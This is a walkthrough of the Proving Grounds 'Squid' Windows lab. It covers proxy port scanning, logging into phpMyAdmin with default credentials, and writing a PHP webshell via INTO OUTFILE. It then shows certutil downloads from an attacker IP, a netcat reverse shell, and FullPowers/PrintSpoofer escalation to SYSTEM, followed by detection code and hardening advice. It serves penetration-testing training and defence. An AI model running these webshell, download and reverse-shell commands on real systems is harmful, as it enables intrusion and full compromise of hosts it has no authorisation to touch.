Box Overview

Squid is a Windows machine from Offensive Security’s Proving Grounds featuring Squid proxy enumeration, PHPMyAdmin exploitation, and privilege escalation through SeImpersonate token abuse using FullPowers and PrintSpoofer.

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.229.189 -T4 -oN first.scan -p-

Open Ports:

  • 135/tcp - Microsoft Windows RPC
  • 139/tcp - NetBIOS-SSN
  • 445/tcp - SMB
  • 3128/tcp - Squid HTTP Proxy 4.14
  • 49666-49667/tcp - Microsoft Windows RPC

Squid Proxy Enumeration

Port 3128 is running Squid Proxy - a caching and forwarding HTTP proxy.

Challenge: Services behind the proxy are not directly accessible from our attack box.

Proxy Port Scanning

Used spose.py - Squid Proxy Open Port Scanner:

Tool: https://github.com/aancw/spose

python3 spose.py --proxy 192.168.229.189:3128 --target 192.168.229.189

Discovery: Port 8080 is accessible through the proxy! 🎯

Proxy Configuration

FoxyProxy Setup

To access services behind the Squid proxy, configure browser proxy settings:

FoxyProxy Configuration:

  • Proxy Type: HTTP
  • Proxy IP: 192.168.229.189
  • Port: 3128

Enable the proxy and navigate to http://192.168.229.189:8080

Web Application Discovery

Service identified: WampServer (Windows Apache MySQL PHP)

Components:

  • Apache web server
  • MySQL database
  • PHP interpreter
  • PHPMyAdmin web interface

Exploitation - PHPMyAdmin

Default Credentials

Accessed PHPMyAdmin at: http://192.168.229.189:8080/phpmyadmin/

Default credentials attempted:

Username: root
Password: (empty)

Authentication successful!

SQL File Write to Webshell

Web Root Discovery

WAMP default web root: C:\wamp\www\

Webshell Upload via SQL

Navigate to SQL tab and execute:

SELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/rev.php';

Explanation:

  • SELECT ... INTO OUTFILE - MySQL file writing functionality
  • Creates PHP webshell at web root
  • $_REQUEST["cmd"] - Accepts commands via GET/POST parameter

Webshell deployed!

Initial Access

Webshell Command Execution

Access webshell at: http://192.168.229.189:8080/rev.php?cmd=COMMAND

Test execution:

http://192.168.229.189:8080/rev.php?cmd=whoami
# Output: nt authority\local service

Reverse Shell

Transfer Netcat

# Host nc.exe on Kali
python3 -m http.server 80

# Download via webshell
http://192.168.229.189:8080/rev.php?cmd=certutil -urlcache -split -f http://192.168.45.222:80/nc.exe C:\Users\Public\nc.exe

Setup Listener

nc -nlvp 9001

Execute Reverse Shell

http://192.168.229.189:8080/rev.php?cmd=C:\Users\Public\nc.exe -e cmd.exe 192.168.45.222 9001

Shell caught as NT AUTHORITY\LOCAL SERVICE!

Privilege Assessment

C:\Users\Public> whoami
nt authority\local service

C:\Users\Public> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Issue: LOCAL SERVICE has limited privileges - cannot access Administrator files!

Local Flag

C:\> type local.txt
[local flag]

Local flag captured!

Privilege Escalation

The LOCAL SERVICE Problem

Current user: NT AUTHORITY\LOCAL SERVICE
Missing: SeImpersonatePrivilege and the other privileges normally granted to this account

Solution: Use FullPowers to recover full LOCAL SERVICE privileges!

Stage 1 - FullPowers

Tool: FullPowers by itm4n

Purpose: Recovers the default privilege set of LOCAL/NETWORK SERVICE accounts.

Why FullPowers?

When LOCAL SERVICE spawns processes (like our reverse shell), they inherit a restricted token with minimal privileges. FullPowers exploits Windows Task Scheduler to spawn a new process with the full unrestricted token.

Execution

Transfer FullPowers:

certutil -urlcache -split -f http://192.168.45.222:80/FullPowers.exe C:\Users\Public\FullPowers.exe

Initial attempt (with -x flag):

C:\Users\Public> FullPowers.exe -x
[+] Started dummy thread with id 3684
[+] Successfully created scheduled task.
[-] Couldn't detect task's process start.

Failed to spawn properly.

Successful attempt (no flags):

C:\Users\Public> FullPowers.exe
[+] Started dummy thread with id 2868
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK

New shell spawned with full privileges!

Verify Privileges

C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

SeImpersonatePrivilege obtained! 🎯

Stage 2 - PrintSpoofer

With SeImpersonate privilege, we can now escalate to SYSTEM using PrintSpoofer.

Tool: PrintSpoofer by itm4n

Transfer PrintSpoofer:

certutil -urlcache -split -f http://192.168.45.222:80/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe

Execute Privilege Escalation

C:\Users\Public> PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

SYSTEM shell spawned! 🎯

C:\Windows\system32> whoami
nt authority\system

Proof Flag

C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
09baa1f71587a22fef46df2c553a2545

Root flag captured!

Attack Chain Summary

  1. Port Scanning → Identified Squid proxy on 3128
  2. Proxy Enumeration → Discovered port 8080 behind proxy
  3. Proxy Configuration → Set up FoxyProxy for access
  4. Service Discovery → Found WampServer with PHPMyAdmin
  5. Default Credentials → Authenticated as root (no password)
  6. SQL File Write → Created PHP webshell via INTO OUTFILE
  7. Webshell Access → Executed commands as LOCAL SERVICE
  8. Reverse Shell → Used netcat for interactive shell
  9. FullPowers → Recovered full LOCAL SERVICE privileges
  10. PrintSpoofer → Escalated from LOCAL SERVICE to SYSTEM
  11. System Access → Full system compromise (NT AUTHORITY\SYSTEM shell)

Technical Deep Dive

Squid Proxy Architecture

[Attacker] → [Squid Proxy :3128] → [Internal Services :8080]

Squid acts as intermediary:

  • Caches HTTP requests
  • Filters/controls access
  • Can hide internal services
  • Access control via ACLs

Enumeration technique:

  • Port scanning through the proxy
  • Connect to proxy, request internal ports
  • Proxy forwards requests internally
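Added example (Python, not part of the original writeup or of spose): the same probing pattern seen from the defender's side. It parses Squid's native access.log format and flags any client that requested many distinct ports on one destination through the proxy within a short window; the log lines are constructed.

```python
import re
from collections import defaultdict

# Squid native access.log line: time elapsed client action/status bytes method URL ident hierarchy type
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+(?P<action>\S+)/(?P<status>\d{3})\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)\s+\S+\s+\S+\s+\S+$")
# Destination host[:port] from "host:port" (CONNECT) or "scheme://host[:port]/..." (GET)
DEST_RE = re.compile(r"^(?:[a-z]+://)?(?P<host>[^/:]+)(?::(?P<port>\d+))?")

def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    d = DEST_RE.match(rec["url"])
    rec["host"] = d.group("host")
    rec["port"] = int(d.group("port") or (443 if rec["method"] == "CONNECT" else 80))
    rec["ts"] = float(rec["ts"])
    return rec

def detect_proxy_port_scans(lines, window=60.0, min_ports=5):
    """{"client->host": sorted ports} for clients that requested min_ports or more
    distinct ports on one host within `window` seconds. 403/503 lines count too."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            hits[(rec["client"], rec["host"])].append((rec["ts"], rec["port"]))
    alerts = {}
    for (client, host), seen in hits.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            ports = {p for t, p in seen[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                alerts[f"{client}->{host}"] = sorted(ports)
                break
    return alerts

# Constructed sample: 10.10.14.7 probes five ports on the proxy host within a second (22/445 fall
# outside Squid's default Safe_ports, CONNECT 5985 is not an SSL port: TCP_DENIED); 10.10.14.9 is benign.
SAMPLE_LOG = """\
1700000000.101     12 10.10.14.7 TCP_MISS/503 3981 GET http://192.168.229.189:21/ - HIER_NONE/- text/html
1700000000.142      2 10.10.14.7 TCP_DENIED/403 3620 GET http://192.168.229.189:22/ - HIER_NONE/- text/html
1700000000.188      2 10.10.14.7 TCP_DENIED/403 3620 GET http://192.168.229.189:445/ - HIER_NONE/- text/html
1700000000.244    105 10.10.14.7 TCP_MISS/200 4521 GET http://192.168.229.189:8080/ - HIER_DIRECT/192.168.229.189 text/html
1700000000.300      3 10.10.14.7 TCP_DENIED/403 3620 CONNECT 192.168.229.189:5985 - HIER_NONE/- text/html
1700000005.000    230 10.10.14.9 TCP_MISS/200 8812 GET http://192.168.229.189:8080/phpmyadmin/ - HIER_DIRECT/192.168.229.189 text/html
"""
```

Denied and failed requests are deliberately kept in the count: a scanner learns which ports exist from the 403/503 responses just as well as from a 200.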

PHPMyAdmin SQL File Write

MySQL File Writing

Requirement: FILE privilege on MySQL

SELECT ... INTO OUTFILE '/path/to/file';

Conditions for success:

  1. User has FILE privilege (root has by default)
  2. secure_file_priv not restricting writes
  3. Web server has write access to target directory
  4. File doesn’t already exist
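Added example (Python, not from the writeup or from MySQL itself): a small model of the conditions above, evaluated for the box's default configuration and for the secure_file_priv remediation. The scenarios and paths are constructed; the operating-system permission condition is not modelled.

```python
import posixpath

def normalize(path):
    """MySQL on Windows accepts both slash styles and is case-insensitive; compare uniformly."""
    return posixpath.normpath(path.replace("\\", "/")).lower()

def outfile_allowed(secure_file_priv, has_file_priv, target_path, target_exists):
    """Model of the server-side checks a SELECT ... INTO OUTFILE must pass.
    secure_file_priv: None models NULL (file import/export disabled), "" models the
    unrestricted default seen on the box, any other value is the only allowed directory.
    OS-level write permission for the mysqld process is not modelled here."""
    reasons = []
    if not has_file_priv:
        reasons.append("account lacks the FILE privilege")
    if secure_file_priv is None:
        reasons.append("secure_file_priv=NULL disables INTO OUTFILE entirely")
    elif secure_file_priv != "":
        base = normalize(secure_file_priv).rstrip("/") + "/"
        if not normalize(target_path).startswith(base):
            reasons.append(f"target lies outside secure_file_priv ({secure_file_priv})")
    if target_exists:
        reasons.append("INTO OUTFILE never overwrites an existing file")
    return (not reasons, reasons)

# Constructed scenarios: the box as found, then each remediation on its own.
WEBSHELL = "C:/wamp/www/rev.php"
SCENARIOS = {
    "wamp_default":      ("",                        True,  WEBSHELL, False),
    "existing_file":     ("",                        True,  WEBSHELL, True),
    "no_file_priv":      ("",                        False, WEBSHELL, False),
    "secure_dir":        ("C:/mysql/secure_upload/", True,  WEBSHELL, False),
    "secure_dir_dotdot": ("C:/mysql/secure_upload/", True,
                          "C:/mysql/secure_upload/../../wamp/www/rev.php", False),
    "secure_dir_inside": ("C:/mysql/secure_upload/", True,
                          "C:\\mysql\\secure_upload\\export.csv", False),
    "disabled":          (None,                      True,  WEBSHELL, False),
}

def evaluate_all():
    return {name: outfile_allowed(*args) for name, args in SCENARIOS.items()}

if __name__ == "__main__":
    for name, (ok, why) in evaluate_all().items():
        print(f"{name:20} {'ALLOWED' if ok else 'blocked'} {'; '.join(why)}")
```

The "secure_dir_dotdot" case is the one to note: a directory value only holds if the path is normalised before the comparison, which is why NULL is the stronger setting when exports are not needed at all.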

WAMP Default Configuration

Vulnerabilities:

  • No root password by default
  • PHPMyAdmin accessible remotely
  • Web root writable by Apache user
  • No file upload restrictions

LOCAL SERVICE Token Limitations

Default LOCAL SERVICE process:

  • Stripped token with minimal privileges
  • Missing SeImpersonate
  • Cannot directly escalate to SYSTEM

Child processes inherit:

  • Restricted token
  • Minimal privilege set
  • Limited access rights

FullPowers Exploitation

Technique:

  1. Create scheduled task via Task Scheduler
  2. Task runs as LOCAL SERVICE with unrestricted token
  3. Scheduled task spawns new process
  4. New process inherits full privilege set
  5. SeImpersonate privilege restored

Why it works:

  • Task Scheduler grants full tokens to service accounts
  • Scheduled tasks don’t inherit parent restrictions
  • LOCAL SERVICE can create scheduled tasks

PrintSpoofer Exploitation

Attack Vector: Print Spooler service abuse

Technique:

  1. Create named pipe as LOCAL SERVICE
  2. Trigger Print Spooler to connect
  3. Print Spooler connects as SYSTEM
  4. Impersonate SYSTEM token using SeImpersonate
  5. Spawn process with SYSTEM privileges

Requirements:

  • SeImpersonatePrivilege enabled
  • Print Spooler service running (default)
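Added example (Python, not part of the writeup or of either tool): a correlation rule over exported Security events for the two stages above, a scheduled task authored by a service-account SID (event 4698) followed by SeImpersonatePrivilege use (event 4673) from the same SID. Field names follow the EventData names of those two events; the records, task name, process path and timestamps are constructed, and the rule assumes both Other Object Access Events (4698) and Sensitive Privilege Use (4673) auditing are enabled.

```python
from datetime import datetime, timedelta

SERVICE_SIDS = {"S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE"}

def correlate_token_recovery(events, window_minutes=30):
    """events: dicts with EventID, TimeCreated (datetime) and the Security log's
    EventData field names. One alert per service-account SID that authored a
    scheduled task (4698); severity becomes 'high' when the same SID exercises
    SeImpersonatePrivilege (4673) within window_minutes of that task."""
    alerts = {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        sid = ev.get("SubjectUserSid")
        if sid not in SERVICE_SIDS:   # SYSTEM and ordinary users are out of scope here
            continue
        if ev["EventID"] == 4698:     # service accounts rarely author tasks themselves
            alerts[sid] = {"account": SERVICE_SIDS[sid], "task": ev.get("TaskName"),
                           "task_time": ev["TimeCreated"], "severity": "medium",
                           "impersonating_process": None}
        elif (ev["EventID"] == 4673 and sid in alerts
              and "SeImpersonatePrivilege" in ev.get("PrivilegeList", "")
              and ev["TimeCreated"] - alerts[sid]["task_time"] <= timedelta(minutes=window_minutes)):
            alerts[sid]["severity"] = "high"
            alerts[sid]["impersonating_process"] = ev.get("ProcessName")
    return alerts

# Constructed sample: task creation by LOCAL SERVICE, impersonation two minutes later,
# plus benign noise from SYSTEM and a regular user. Task and process names are made up.
T0 = datetime(2024, 1, 1, 12, 0)
SAMPLE_EVENTS = [
    {"EventID": 4698, "TimeCreated": T0, "SubjectUserSid": "S-1-5-19",
     "SubjectUserName": "LOCAL SERVICE", "TaskName": "\\fp_task"},
    {"EventID": 4673, "TimeCreated": T0 + timedelta(minutes=2), "SubjectUserSid": "S-1-5-19",
     "PrivilegeList": "SeImpersonatePrivilege", "ProcessName": "C:\\Users\\Public\\PrintSpoofer.exe"},
    {"EventID": 4673, "TimeCreated": T0 + timedelta(minutes=3), "SubjectUserSid": "S-1-5-18",
     "PrivilegeList": "SeTcbPrivilege", "ProcessName": "C:\\Windows\\System32\\lsass.exe"},
    {"EventID": 4698, "TimeCreated": T0 + timedelta(hours=1), "SubjectUserSid": "S-1-5-21-1-2-3-1001",
     "SubjectUserName": "alice", "TaskName": "\\Backup"},
]

if __name__ == "__main__":
    for sid, a in correlate_token_recovery(SAMPLE_EVENTS).items():
        print(sid, a["severity"], a["account"], a["task"], a["impersonating_process"])
```

A 4698 from LOCAL SERVICE on its own is worth a look because the stock token of that account, as the whoami /priv output above shows, is rarely used to author tasks; the 4673 that follows is what separates the FullPowers-then-impersonate sequence from ordinary service noise.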

Remediation

Squid Proxy Hardening

# /etc/squid/squid.conf
# http_access rules are evaluated top-down and the first match wins, so the
# port restrictions must come before the allow rule for local clients.

# Only allow plain HTTP to 80/443 and CONNECT to 443; everything else is denied
acl Safe_ports port 80 443
acl SSL_ports port 443
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports

# Restrict access by IP
acl localnet src 192.168.1.0/24
http_access allow localnet
http_access deny all

# Hide internal topology
forwarded_for delete
via off

PHPMyAdmin Security

1. Authentication

// config.inc.php
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;

2. Set MySQL Root Password

ALTER USER 'root'@'localhost' IDENTIFIED BY 'ComplexPassword123!';
FLUSH PRIVILEGES;

3. Restrict File Operations

# my.ini / my.cnf
[mysqld]
secure_file_priv = "C:/mysql/secure_upload/"

4. Network Restrictions

# httpd.conf (Apache 2.4: a request that matches no Require directive is denied,
# so no trailing "Require all denied" is needed)
<Directory "C:/wamp/www/phpmyadmin">
    Require ip 127.0.0.1 192.168.1.0/24
</Directory>

Service Account Hardening

1. Disable Unnecessary Privileges

# Remove SeImpersonate if not needed (User Rights Assignment: "Impersonate a client after authentication")
# In a domain, run the service under a managed service account restricted to one computer instead
# of LOCAL SERVICE (on a standalone host, a virtual account NT SERVICE\<name> serves the same purpose)
New-ADServiceAccount -Name WebAppSvc -RestrictToSingleComputer

2. Monitor Token Operations

# Enable audit of privilege use
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable

# Monitor for FullPowers/PrintSpoofer indicators:
# 4673 = sensitive privilege used (e.g. SeImpersonatePrivilege), 4674 = operation on a privileged object
# (enable "Other Object Access Events" auditing as well to get 4698, scheduled task created)
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4673,4674}

3. Patch Print Spooler

# Disable Print Spooler if not needed
Stop-Service Spooler
Set-Service Spooler -StartupType Disabled

# Or apply KB patches addressing PrintNightmare

Defense in Depth

  1. Network Segmentation - Isolate proxies and databases
  2. Principle of Least Privilege - Minimal required permissions
  3. Regular Patching - Keep all services updated
  4. Access Control - IP whitelisting and authentication
  5. Monitoring - Log and alert on suspicious activities

Tools Used

  • nmap
  • spose.py (Squid proxy scanner)
  • FoxyProxy (Browser proxy configuration)
  • certutil (File transfer on Windows)
  • netcat
  • FullPowers.exe
  • PrintSpoofer.exe

Techniques

  • Proxy enumeration and port scanning
  • Browser proxy configuration
  • Default credential exploitation
  • SQL file writing to webshell
  • Reverse shell deployment
  • Token privilege recovery (FullPowers)
  • SeImpersonate abuse (PrintSpoofer)

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice
Tools: itm4n (FullPowers, PrintSpoofer)


“From proxy to SYSTEM - the journey of a thousand privileges begins with a single enumeration.”